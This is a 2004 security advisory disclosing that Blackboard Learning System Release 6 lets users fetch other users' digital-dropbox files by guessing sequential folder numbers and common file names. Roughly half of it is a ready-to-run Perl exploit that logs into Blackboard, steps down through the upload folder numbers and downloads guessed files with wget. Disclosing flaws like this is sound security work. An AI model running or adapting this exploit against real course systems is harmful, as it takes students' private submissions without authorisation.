<<< Date Index >>>     <<< Thread Index >>>

Blackboard Learning System - Stealing documents out of the digital dropbox




Advisory:

Blackboard Learning System - Stealing documents out of the digital dropbox
==========================================================================


Blackboard
----------
The Blackboard Learning System is a Web-based server software platform that 
offers course management.
More information can be found on: http://www.blackboard.com/

Affected Systems
----------------
Blackboard Learning System - Basic Edition? (Release 6) 

This is the only version on which i was able to test the bug. 
Probably more versions are affected.

Overview
--------
A bug in blackboard allows users to steal documents out of the digital dropbox 
of other users.


Details
-------
Each course has it's own digital dropbox.

it can be found for example in:
http://blackboard.nosite.org/courses/1/my_course/uploads/

The digital dropbox is a function in the blackboard system.
It can be found under a course/tools/digital dropbox
This function allows blackboard users to submit files to the course 
administrators.

When submitting a file into the digital dropbox, the users have 2 options:
-Add File: put's the file into the digital dropbox but doesn't sends it to the 
course administrators
-Submit File: put's a file into the digital dropbox and send it to the course 
administrators

(Sending the file wil probably send a notification that a file is dropped)

If a file is submitted it wil be dropped in a folder like this:
http://blackboard.nosite.org/courses/1/my_course/uploads//_19064_1/testfile.txt

For each file that is dropped, a new folder is created:
_19064_1

The number 19064 in this folder is an autonumber.
We can easily find the current number by just adding a file to the digital drop 
box.
This file won't be send to the course administrators.
Files in the folder don't have a form of security.
But we are unable to see which file is in the folder.

But since the software is created for educational purpose, filenames can be 
guessed easy.
Since schools often have rules for naming a file.

So if we change the URL, it is possible to get files out of other people's 
digital dropbox:
http://blackboard.nosite.org/courses/1/my_course/uploads//_19063_1/file_i_want.txt
http://blackboard.nosite.org/courses/1/my_course/uploads//_19062_1/file_i_want.txt
http://blackboard.nosite.org/courses/1/my_course/uploads//_19061_1/file_i_want.txt
...

By doing this we have a good chance to find files that we want.

------------------------------------------------------
                         killer
                       06/05/2004       
              system_error_at_pandora.be                
            http://www.mostly-harmless.nl/
------------------------------------------------------





Exploit Code:

#!/usr/bin/perl

use strict;
use LWP;
use URI;
use Digest::Perl::MD5 'md5_hex';
use MIME::Base64;

#################################################################
#                                                               #
#         fill in these 3 variables to your situation           #
#                                                               #
#################################################################       

my $url_to_bb = "http://blackboard.example.org/";;
my $user     = 'username';
my $password = 'password';
my $encryption = 'md5'; # this may also be base64

#################################################################
# The code for the logging in onto blackboard.                  #
# I thank vandreadfull for providing me with this code          #
#################################################################

my @headers = ('User-Agent'      => 'SQL Injection Tester/1.1b (M & H)',
               'Accept-Language' => 'en-US',
               'Accept-Charset'  => 'iso-8859-1,*,utf-8',
               'Accept-Encoding' => '',
               'Accept'          => '*/*'
               );
my $browser = LWP::UserAgent->new(keep_alive => 1);
$browser->cookie_jar({});


print "logging in\n";

my $url = $url_to_bb;
print '.';
$_ = ($browser->get($url, @headers))->content;
#one more time, for some reason (probably a session or something) blackboard 
doesnt provide us with the one_time_token the first time
$_ = ($browser->get($url."webapps/login", @headers))->content;
my $string = $_;

# Process page to fetch hidden HTML form variables
my %postvars;
$postvars{login}    = 'Log In';
$postvars{password} = '';
while ($string =~ m{INPUT VALUE="(.*?)" NAME="(.*?)" TYPE="hidden"}g) {
    if ($2 ne 'password') {
$postvars{$2} = $1;
    }
}

# Set the username
$postvars{user_id}    = $user;
# Setting the password (md5 or base64)
if ($encryption eq 'md5') {
$_ = $string;
/<INPUT VALUE=\"([^"]*)\" NAME=\"one\_time\_token\"/;
my $one_time_token = $1; 
$password = md5_hex($password);
$password =~y/a-z/A-Z/;
$password = md5_hex("$password$one_time_token");
$password =~y/a-z/A-Z/;
$postvars{encoded_pw} = $password; 
}
if ($encryption eq 'base64') {
$postvars{encoded_pw} = encode_base64($password);
}

# Post login
$url = $url_to_bb."webapps/login";
print '.';
my $response = $browser->post($url, [%postvars], @headers);

# Do another refresh
$_ = $response->content;
$_ =~ m{document\.location\.replace\(\'(.*?)\'\)} || exit 1;
$url = $url_to_bb . $1;
print '.';
$browser->get($url, @headers)->content;

print "logged in\n";


#################################################################
#                                                               # 
#    Fill in these 3 variables according to your needs          #
#                                 #
#################################################################

my $path="http://blackboard.example.org/courses/1/my_course/uploads//_19063_1/";;
my @file=("test.txt","doc2.txt");
my $loop=10;
         

#################################################################
#        The code for exploiting the vulnerability              # 
#################################################################

my $file;
my $wget;

$_=reverse($path);
/_(.*?)_/;
my $autocount=reverse($1);

my $orig_count=$autocount;

$wget="wget -q ";
for(my $t=0;$t<$loop;$t++) {
    $autocount--;
    $url=$path;
    $url=~ s/$orig_count/$autocount/;
    foreach $file (@file) {
system("$wget$url$file");
    }
}
print("\nDone, if the files existed they should be in this directory.\n\nkiller 
2004\nhttp://www.mostly-harmless.nl/";);


Kind regards

killer
http://www.mostly-harmless.nl